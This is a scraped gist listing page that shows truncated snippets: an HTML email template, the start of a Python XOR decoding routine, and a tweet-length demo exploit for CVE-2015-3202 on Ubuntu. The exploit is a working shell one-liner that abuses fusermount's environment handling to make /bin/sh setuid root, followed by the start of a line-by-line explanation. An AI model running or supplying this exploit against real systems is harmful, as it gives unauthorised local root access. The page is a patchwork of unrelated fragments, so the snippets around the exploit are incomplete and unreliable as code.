Steven K Xyl2k
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <style> | |
| * { | |
| font-family:Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif; | |
| } | |
| </style> | |
| </head> | |
| <body> | |
| <table cellpadding="0" cellspacing="0" class="email-wrapper" style="padding-top:32px;background-color:#ffffff;"><tbody> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import hashlib | |
| import struct | |
| import requests | |
| def decode(data,seed,step): | |
| r = [] | |
| k = seed | |
| for c in map(ord,data): | |
| r.append(chr(c ^ k)) |
taviso
/ CVE-2015-3202
Created
May 21, 2015 12:52
Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet. | |
| 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890 | |
| a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 | |
| # Here's how it works, $a holds the name of a shellscript to be executed as | |
| # root. | |
| a=/tmp/.$$; | |
| # $b is used twice, first to build the contents of shellscript $a, and then as |